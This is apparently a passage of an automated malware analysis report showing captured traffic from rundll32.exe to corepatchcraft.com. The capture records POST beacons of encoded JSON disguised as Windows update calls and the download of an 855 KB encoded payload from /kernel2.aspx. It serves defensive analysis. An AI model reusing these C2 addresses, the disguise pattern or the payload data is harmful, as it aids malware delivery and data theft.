                        2025-01-16 05:02:04 UTC16384INData Raw: 7a 35 31 6d 78 67 57 79 6d 61 71 71 61 45 33 44 43 34 33 48 76 44 65 50 54 45 36 39 67 4a 57 6d 67 59 53 43 76 59 43 56 70 6f 47 45 0d 0a 47 2f 71 67 32 6f 5a 6c 77 51 4f 4e 66 35 6e 68 41 4c 54 48 63 4d 55 59 62 73 51 4a 52 76 6f 5a 70 61 30 50 54 45 39 78 54 46 6e 68 43 4c 53 4a 4d 55 52 59 61 6b 31 49 78 54 79 77 6e 6d 73 4a 0d 0a 4c 45 5a 68 78 77 78 6d 78 42 32 6d 2b 67 6c 52 34 77 69 73 78 54 79 77 32 71 74 42 77 51 4f 64 78 77 79 47 78 42 32 32 2b 67 6d 78 34 77 69 6f 78 54 79 6f 30 43 65 52 77 78 75 52 78 31 76 6a 0d 0a 43 4a 44 46 50 4a 44 53 65 38 51 64 75 76 6f 4a 6f 61 31 4e 4c 41 68 35 58 4e 49 6e 74 59 39 50 75 51 70 52 65 73 59 64 74 76 6f 4a 72 65 4d 50 54 4d 30 4d 75 46 6b 66 52 49 38 4c 67 55 78 5a 0d 0a 61 6b 32 6a 52 2f 6f 42 72 57 6b
                        Data Ascii: z51mxgWymaqqaE3DC43HvDePTE69gJWmgYSCvYCVpoGEG/qg2oZlwQONf5nhALTHcMUYbsQJRvoZpa0PTE9xTFnhCLSJMURYak1IxTywnmsJLEZhxwxmxB2m+glR4wisxTyw2qtBwQOdxwyGxB22+gmx4wioxTyo0CeRwxuRx1vjCJDFPJDSe8QduvoJoa1NLAh5XNIntY9PuQpResYdtvoJreMPTM0MuFkfRI8LgUxZak2jR/oBrWk
                        2025-01-16 05:02:04 UTC16384INData Raw: 70 6f 47 45 67 72 30 5a 30 6f 59 6e 74 79 59 52 72 56 35 36 4b 65 6c 4f 63 55 78 5a 0d 0a 4f 69 6e 42 61 33 46 4d 57 57 6f 63 79 36 4a 74 48 77 38 39 78 43 32 2b 2b 41 47 78 34 51 69 67 78 7a 53 51 30 69 65 52 77 51 4f 52 78 77 79 4b 78 6b 72 48 4e 4b 6a 53 4a 30 56 48 38 43 42 42 0d 0a 33 4c 68 43 7a 66 39 78 54 46 6e 68 43 45 44 4e 73 56 77 4a 34 51 43 67 70 6b 69 2f 70 70 58 45 44 61 4c 36 41 62 58 68 47 45 54 48 49 45 6a 53 4c 36 48 44 41 33 6e 47 43 47 62 46 47 45 4c 36 0d 0a 43 62 31 6c 38 77 42 44 39 49 55 74 62 4d 59 64 6f 76 67 5a 76 61 30 49 74 45 35 78 54 46 6e 68 43 4b 51 65 2b 67 46 52 34 56 77 61 78 54 79 6b 73 51 32 79 74 37 48 34 43 59 48 68 43 4b 54 46 0d 0a 50 4a 54 51 59 73 59 64 6f 69 50 48 48 47 4c 47 41 45 59 67 78 78 53 43 70 51 47
                        Data Ascii: poGEgr0Z0oYntyYRrV56KelOcUxZOinBa3FMWWocy6JtHw89xC2++AGx4QigxzSQ0ieRwQORxwyKxkrHNKjSJ0VH8CBB3LhCzf9xTFnhCEDNsVwJ4QCgpki/ppXEDaL6AbXhGETHIEjSL6HDA3nGCGbFGEL6Cb1l8wBD9IUtbMYdovgZva0ItE5xTFnhCKQe+gFR4VwaxTyksQ2yt7H4CYHhCKTFPJTQYsYdoiPHHGLGAEYgxxSCpQG
                        2025-01-16 05:02:04 UTC16384INData Raw: 74 37 46 43 6a 4a 69 4b 54 55 76 4c 0d 0a 76 62 4b 6d 6c 63 54 4e 68 6f 2b 7a 70 75 45 41 75 4d 63 38 2f 4e 4c 2f 68 62 61 78 6a 73 55 4d 78 73 59 4e 51 76 6f 42 53 65 50 49 61 4c 47 4f 73 39 44 6e 61 62 65 78 6a 71 64 4c 34 52 6a 34 0d 0a 7a 5a 74 4e 30 44 2f 39 77 77 76 64 7a 35 6c 72 78 41 33 69 38 6a 48 70 61 6a 74 6f 77 2f 78 73 70 70 57 79 77 63 4f 31 73 71 61 56 78 68 33 69 66 76 70 62 4f 73 62 46 69 6f 2b 7a 70 6f 4b 77 0d 0a 57 30 39 78 70 35 48 68 77 47 69 78 6a 72 50 53 2f 32 6d 33 73 59 37 46 31 44 4b 7a 74 37 48 34 32 51 57 55 73 72 66 46 39 42 53 6e 6c 62 4c 44 77 79 32 79 70 70 58 45 44 55 4c 34 41 55 6d 44 0d 0a 7a 55 70 4f 63 63 30 6b 77 6b 31 4a 54 6e 46 44 33 42 4a 4d 53 45 37 38 32 58 6d 55 73 72 66 48 4a 4f 6a 53 4c 2b 6e 42 79 7a 47
                        Data Ascii: t7FCjJiKTUvLvbKmlcTNho+zpuEAuMc8/NL/hbaxjsUMxsYNQvoBSePIaLGOs9DnabexjqdL4Rj4zZtN0D/9wwvdz5lrxA3i8jHpajtow/xsppWywcO1sqaVxh3ifvpbOsbFio+zpoKwW09xp5HhwGixjrPS/2m3sY7F1DKzt7H42QWUsrfF9BSnlbLDwy2yppXEDUL4AUmDzUpOcc0kwk1JTnFD3BJMSE782XmUsrfHJOjSL+nByzG
                        2025-01-16 05:02:04 UTC16384INData Raw: 31 47 2b 42 6d 4a 34 51 6a 38 78 7a 53 59 30 69 65 5a 77 51 4f 35 78 77 79 36 78 42 32 43 2b 67 6d 56 4f 73 59 46 68 70 6d 77 38 47 70 4e 49 6b 37 38 41 65 6b 37 70 55 6e 45 6a 72 50 61 0d 0a 72 6b 56 48 2b 4b 48 4a 69 78 39 61 49 46 68 4e 54 46 6b 43 6e 51 35 47 59 53 52 42 4e 30 56 59 70 69 46 50 58 32 72 4f 6a 45 4b 32 43 5a 31 71 54 55 68 4f 2f 41 48 74 34 77 43 67 78 53 53 6b 0d 0a 30 6d 6a 45 44 59 37 36 41 62 48 68 47 49 7a 48 59 4d 63 63 71 73 51 4e 38 76 6f 42 35 65 4d 41 38 49 6b 30 73 4b 61 56 73 72 66 44 50 50 79 78 63 70 46 49 54 76 6f 4a 34 65 45 41 76 43 72 34 0d 0a 51 56 6c 71 54 55 6a 46 6c 42 47 61 70 6f 47 45 67 72 32 41 6c 54 2f 47 70 4d 32 64 43 4e 51 76 73 73 45 4c 67 53 5a 59 35 77 43 33 48 35 6d 46 4f 47 68 4e 79 34 70 35 78 52 79
                        Data Ascii: 1G+BmJ4Qj8xzSY0ieZwQO5xwy6xB2C+gmVOsYFhpmw8GpNIk78Aek7pUnEjrParkVH+KHJix9aIFhNTFkCnQ5GYSRBN0VYpiFPX2rOjEK2CZ1qTUhO/AHt4wCgxSSk0mjEDY76AbHhGIzHYMccqsQN8voB5eMA8Ik0sKaVsrfDPPyxcpFITvoJ4eEAvCr4QVlqTUjFlBGapoGEgr2AlT/GpM2dCNQvssELgSZY5wC3H5mFOGhNy4p5xRy
                        2025-01-16 05:02:04 UTC16384INData Raw: 58 46 48 4f 4c 30 54 45 35 78 54 44 4b 37 73 73 4d 4c 2b 55 38 4a 62 73 51 64 79 76 6f 42 33 65 46 63 77 52 76 78 78 78 7a 71 7a 58 42 50 0d 0a 42 45 57 65 4c 35 46 4a 54 6e 46 4d 73 6d 32 4b 44 5a 4a 78 54 46 6c 71 78 77 57 53 2b 51 47 75 5a 66 73 64 75 66 53 65 4c 48 30 6c 51 56 78 78 54 44 47 36 43 30 42 65 47 65 41 36 59 6c 32 67 0d 0a 39 36 56 4a 57 65 6d 4a 52 4d 55 38 73 4e 6f 54 58 55 67 37 5a 69 52 54 65 45 31 49 4a 71 45 4b 55 58 6f 6c 6f 43 31 35 58 4c 48 7a 6d 55 31 4f 38 6f 68 56 34 51 68 41 78 2f 51 77 70 70 57 79 0d 0a 79 36 4a 68 78 35 58 6a 36 44 69 78 6a 72 50 53 2f 7a 47 33 73 59 34 65 73 59 4d 4a 74 37 48 36 43 61 58 68 42 56 69 6d 6e 2f 68 5a 61 73 59 46 73 76 6f 4e 53 65 47 6f 46 59 78 31 54 4a 57 6d 0d 0a 47 4d 4f 69 47 37 4d 78 78
                        Data Ascii: XFHOL0TE5xTDK7ssML+U8JbsQdyvoB3eFcwRvxxxzqzXBPBEWeL5FJTnFMsm2KDZJxTFlqxwWS+QGuZfsdufSeLH0lQVxxTDG6C0BeGeA6Yl2g96VJWemJRMU8sNoTXUg7ZiRTeE1IJqEKUXoloC15XLHzmU1O8ohV4QhAx/QwppWyy6Jhx5Xj6DixjrPS/zG3sY4esYMJt7H6CaXhBVimn/hZasYFsvoNSeGoFYx1TJWmGMOiG7Mxx
                        2025-01-16 05:02:04 UTC16384INData Raw: 41 36 53 59 38 4c 6a 62 4f 6d 6c 62 4c 46 41 37 6d 6b 66 47 46 50 53 45 48 48 43 5a 45 36 0d 0a 77 41 57 65 6d 58 51 63 61 45 33 44 43 33 6d 6c 51 6d 68 4e 53 4d 55 38 76 4e 71 72 53 63 48 44 67 62 4b 6d 6c 66 64 4d 54 6e 46 4d 4d 71 69 79 77 38 4f 42 73 71 61 56 54 67 6c 4b 2b 4d 6d 31 0d 0a 6c 4c 4b 33 78 65 53 67 70 35 57 79 77 30 7a 34 79 62 47 55 73 72 66 46 2f 4b 53 6e 6c 62 4c 49 64 33 41 35 55 4b 30 49 36 45 39 78 54 46 6d 42 53 6f 38 4c 30 55 78 5a 61 6b 33 43 47 39 48 45 0d 0a 44 4c 56 43 2f 67 75 75 79 5a 6b 66 57 69 42 70 59 6b 78 5a 41 70 30 4f 52 6d 45 6b 39 51 6c 46 57 4b 61 65 36 56 78 71 7a 6f 78 43 2b 68 6d 70 36 54 64 6b 54 67 52 46 6e 69 2f 52 53 55 35 78 0d 0a 54 4c 4a 74 69 67 33 53 63 55 78 5a 61 73 63 4e 30 76 6b 4a 68 32 58 37 42
                        Data Ascii: A6SY8LjbOmlbLFA7mkfGFPSEHHCZE6wAWemXQcaE3DC3mlQmhNSMU8vNqrScHDgbKmlfdMTnFMMqiyw8OBsqaVTglK+Mm1lLK3xeSgp5Wyw0z4ybGUsrfF/KSnlbLId3A5UK0I6E9xTFmBSo8L0UxZak3CG9HEDLVC/guuyZkfWiBpYkxZAp0ORmEk9QlFWKae6VxqzoxC+hmp6TdkTgRFni/RSU5xTLJtig3ScUxZascN0vkJh2X7B
                        2025-01-16 05:02:04 UTC16384INData Raw: 4b 33 39 48 42 4d 57 57 72 49 6d 6a 74 71 0d 0a 69 68 79 6f 54 59 38 4c 6a 62 4f 6d 6c 62 4c 46 41 36 32 6b 31 4b 4e 4d 53 4d 51 30 6a 72 41 7a 51 45 68 4f 6d 43 31 64 61 6b 33 44 43 34 48 50 6d 54 49 64 77 77 4e 35 70 4c 6a 41 73 72 66 33 0d 0a 63 45 78 5a 61 73 69 42 4f 32 71 4b 48 4b 74 4e 6a 77 75 4e 73 36 61 56 73 73 55 44 72 61 51 4d 6f 30 78 49 78 44 53 4e 73 45 74 41 53 45 36 59 5a 56 31 71 54 63 4d 62 67 63 66 62 36 6b 31 49 0d 0a 54 76 72 47 33 57 70 4e 53 4d 66 30 4d 4b 53 56 73 73 48 44 38 62 47 6d 6c 63 62 64 4d 6f 79 7a 70 75 48 49 79 4c 4f 4f 73 39 44 2f 4c 62 57 78 6a 73 58 63 44 72 43 33 73 66 7a 42 4f 5a 65 79 0d 0a 74 78 2f 36 41 56 47 43 69 2f 61 78 6a 76 5a 59 61 6b 31 49 79 36 4d 35 51 71 77 49 69 45 36 32 43 61 57 56 73 72 65 78 2f
                        Data Ascii: K39HBMWWrImjtqihyoTY8LjbOmlbLFA62k1KNMSMQ0jrAzQEhOmC1dak3DC4HPmTIdwwN5pLjAsrf3cExZasiBO2qKHKtNjwuNs6aVssUDraQMo0xIxDSNsEtASE6YZV1qTcMbgcfb6k1ITvrG3WpNSMf0MKSVssHD8bGmlcbdMoyzpuHIyLOOs9D/LbWxjsXcDrC3sfzBOZeytx/6AVGCi/axjvZYak1Iy6M5QqwIiE62CaWVsrex/
                        2025-01-16 05:02:04 UTC16384INData Raw: 42 61 72 36 47 62 32 74 54 30 68 4f 63 55 7a 53 4c 36 6d 50 44 6e 56 4d 57 57 70 4e 77 77 4f 56 69 78 68 69 54 55 68 4f 63 59 6f 63 6c 6b 7a 44 47 35 6e 50 6d 33 72 45 48 5a 4c 36 43 59 58 6a 0d 0a 43 49 7a 44 50 4c 34 49 5a 66 73 64 76 79 50 48 46 4b 36 6c 4e 66 47 50 73 39 49 76 6b 59 38 4f 66 55 78 5a 61 6b 32 4f 43 34 31 4f 30 69 65 6c 79 34 39 52 78 52 53 79 78 68 32 57 2b 42 6d 5a 0d 0a 35 77 69 34 48 6e 37 36 46 49 55 63 77 77 4f 78 70 42 62 56 73 37 66 46 4a 4a 53 65 4b 45 46 49 54 6e 46 4d 6e 79 2b 78 53 38 55 30 70 4a 34 71 66 55 68 4f 63 55 7a 53 4a 36 57 4f 44 30 56 4d 0d 0a 30 6a 2b 6c 79 34 78 4a 78 51 79 2b 39 55 78 4f 63 55 77 79 6f 6b 54 44 47 36 57 4c 58 57 42 4e 53 45 35 78 69 68 79 57 53 63 55 4c 66 52 7a 53 4a 35 6d 67 4f 2b 4a 4e 57
                        Data Ascii: Bar6Gb2tT0hOcUzSL6mPDnVMWWpNwwOVixhiTUhOcYoclkzDG5nPm3rEHZL6CYXjCIzDPL4IZfsdvyPHFK6lNfGPs9IvkY8OfUxZak2OC41O0iely49RxRSyxh2W+BmZ5wi4Hn76FIUcwwOxpBbVs7fFJJSeKEFITnFMny+xS8U0pJ4qfUhOcUzSJ6WOD0VM0j+ly4xJxQy+9UxOcUwyokTDG6WLXWBNSE5xihyWScULfRzSJ5mgO+JNW
                        2025-01-16 05:02:04 UTC16384INData Raw: 6d 58 67 62 62 6b 32 50 43 34 32 7a 70 70 57 79 78 51 50 4e 70 43 6b 45 54 45 6a 46 4e 4b 44 61 55 6b 30 39 57 52 6d 6a 66 47 70 4e 49 4a 34 33 0d 0a 52 45 6b 43 34 52 78 47 59 61 54 6f 63 45 68 49 7a 62 56 41 30 6a 2b 68 77 30 7a 37 52 4e 45 6e 70 63 67 7a 6d 55 30 74 59 73 30 31 70 6e 4d 34 63 6f 45 66 77 78 75 64 78 78 78 69 78 67 4a 4b 0d 0a 53 67 52 64 48 30 53 50 43 35 56 4e 57 57 70 4e 6f 30 6d 32 43 62 31 71 54 55 68 4f 2b 78 6d 39 34 68 69 37 78 44 53 2f 73 6a 62 47 44 61 4c 36 41 56 48 68 48 55 42 31 49 45 51 73 59 34 6f 4e 0d 0a 72 6e 42 4d 57 57 71 6d 54 34 6b 30 72 46 6c 71 54 55 6a 45 4e 4b 7a 52 4c 37 2f 43 43 34 4f 6e 61 75 45 41 51 4d 55 67 51 4e 41 2f 6d 63 4d 4c 6e 63 63 52 5a 73 51 46 6c 76 6f 5a 67 56 45 59 0d 0a 6e 44 74 34 69 78 79
                        Data Ascii: mXgbbk2PC42zppWyxQPNpCkETEjFNKDaUk09WRmjfGpNIJ43REkC4RxGYaTocEhIzbVA0j+hw0z7RNEnpcgzmU0tYs01pnM4coEfwxudxxxixgJKSgRdH0SPC5VNWWpNo0m2Cb1qTUhO+xm94hi7xDS/sjbGDaL6AVHhHUB1IEQsY4oNrnBMWWqmT4k0rFlqTUjENKzRL7/CC4OnauEAQMUgQNA/mcMLnccRZsQFlvoZgVEYnDt4ixy


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.64971494.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:03 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 585
                        Cache-Control: no-cache
                        2025-01-16 05:02:03 UTC585OUTData Raw: 64 61 74 61 3d 65 79 4a 42 62 6c 64 47 61 43 49 36 49 6b 4a 32 59 57 46 46 54 6a 6b 72 52 7a 6b 76 62 31 5a 5a 55 31 67 72 64 7a 30 39 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6b 68 6b 56 6c 46 77 51 53 49 36 49 6b 63 35 65 54 5a 49 4c 7a 6c 47 55 46 41 76 51 69 49 73 49 6c 46 47 57 6e 6c 70 61 56 56 59 57 53 49 36 49 6c 6b 31 61 6d 35 69 4e 6d 64 49 49 69 77 69 55 6d 4a 76 64 43 49 36 49 6b 52 6c 56 30 35 47 5a 44 6c 73 52 33 4d 76 4f 53 49 73 49 6c 4e 69 57 6c 64 75 57 43 49 36 49 6d 45 31 63 6e 5a 69 4e 6d 39 44 49 69 77 69 57 57 74 4b 56 79 49 36 57 79 4a 68 63 45 78 32 59 6e 63 39 50 53 4a 64 4c 43 4a 6a 5a 6b 74 59 49 6a 6f 69 59 6d 63 39 50 53
                        Data Ascii: data=eyJBbldGaCI6IkJ2YWFFTjkrRzkvb1ZZU1grdz09IiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsIkhkVlFwQSI6Ikc5eTZILzlGUFAvQiIsIlFGWnlpaVVYWSI6Ilk1am5iNmdIIiwiUmJvdCI6IkRlV05GZDlsR3MvOSIsIlNiWlduWCI6ImE1cnZiNm9DIiwiWWtKVyI6WyJhcEx2Ync9PSJdLCJjZktYIjoiYmc9PS
                        2025-01-16 05:02:04 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:04 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:04 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.64971694.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:05 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:05 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:05 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:05 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:05 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.64972294.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:06 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:06 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:07 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:06 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:07 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.64973494.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:07 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:02:07 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:02:08 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:08 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:02:08 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.64973394.159.113.2134437036C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:02:08 UTC81OUTGET /kernel2.aspx HTTP/1.1
                        Host: corepatchcraft.com
                        Cache-Control: no-cache
                        2025-01-16 05:02:08 UTC252INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:02:08 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        Last-Modified: Fri, 10 Jan 2025 13:04:21 GMT
                        ETag: "d0d40-62b59bbb4c5fe"
                        Accept-Ranges: bytes
                        Content-Length: 855360
                        Connection: close
                        2025-01-16 05:02:08 UTC7940INData Raw: 41 51 50 36 54 55 74 4f 63 55 78 64 61 6b 31 49 73 59 35 4d 57 64 4a 4e 53 45 35 78 54 46 6c 71 44 55 68 4f 63 55 78 5a 61 6b 31 49 54 6e 46 4d 57 57 70 4e 53 45 35 78 54 46 6c 71 54 55 68 4f 0d 0a 63 55 78 5a 61 6b 31 49 54 6e 46 4d 57 57 70 4e 57 45 39 78 54 46 64 31 39 30 5a 4f 78 55 57 55 53 2f 56 4a 41 72 78 74 44 51 49 6b 4f 32 34 42 50 6a 59 4e 50 79 6b 6a 55 53 38 34 42 43 4d 6e 0d 0a 4f 6c 45 75 50 45 6f 2f 50 53 42 52 4a 54 64 4b 43 51 63 64 55 53 45 32 44 69 68 6d 51 33 78 47 66 57 70 4e 53 45 35 78 54 46 6d 6a 68 65 78 48 2f 4f 57 54 4d 4d 44 68 68 43 76 42 38 4b 41 58 0d 0a 46 70 57 34 46 39 2f 44 68 78 49 51 71 6f 4d 43 52 75 53 43 46 50 70 6b 6c 7a 48 51 34 59 51 72 78 33 47 6a 46 74 44 6e 75 78 59 48 73 59 4d 54 31 64 69 47 41 2b 46 6c 68
                        Data Ascii: AQP6TUtOcUxdak1IsY5MWdJNSE5xTFlqDUhOcUxZak1ITnFMWWpNSE5xTFlqTUhOcUxZak1ITnFMWWpNWE9xTFd190ZOxUWUS/VJArxtDQIkO24BPjYNPykjUS84BCMnOlEuPEo/PSBRJTdKCQcdUSE2DihmQ3xGfWpNSE5xTFmjhexH/OWTMMDhhCvB8KAXFpW4F9/DhxIQqoMCRuSCFPpklzHQ4YQrx3GjFtDnuxYHsYMT1diGA+Flh
                        2025-01-16 05:02:08 UTC16384INData Raw: 7a 35 31 6d 78 67 57 79 6d 61 71 71 61 45 33 44 43 34 33 48 76 44 65 50 54 45 36 39 67 4a 57 6d 67 59 53 43 76 59 43 56 70 6f 47 45 0d 0a 47 2f 71 67 32 6f 5a 6c 77 51 4f 4e 66 35 6e 68 41 4c 54 48 63 4d 55 59 62 73 51 4a 52 76 6f 5a 70 61 30 50 54 45 39 78 54 46 6e 68 43 4c 53 4a 4d 55 52 59 61 6b 31 49 78 54 79 77 6e 6d 73 4a 0d 0a 4c 45 5a 68 78 77 78 6d 78 42 32 6d 2b 67 6c 52 34 77 69 73 78 54 79 77 32 71 74 42 77 51 4f 64 78 77 79 47 78 42 32 32 2b 67 6d 78 34 77 69 6f 78 54 79 6f 30 43 65 52 77 78 75 52 78 31 76 6a 0d 0a 43 4a 44 46 50 4a 44 53 65 38 51 64 75 76 6f 4a 6f 61 31 4e 4c 41 68 35 58 4e 49 6e 74 59 39 50 75 51 70 52 65 73 59 64 74 76 6f 4a 72 65 4d 50 54 4d 30 4d 75 46 6b 66 52 49 38 4c 67 55 78 5a 0d 0a 61 6b 32 6a 52 2f 6f 42 72 57 6b
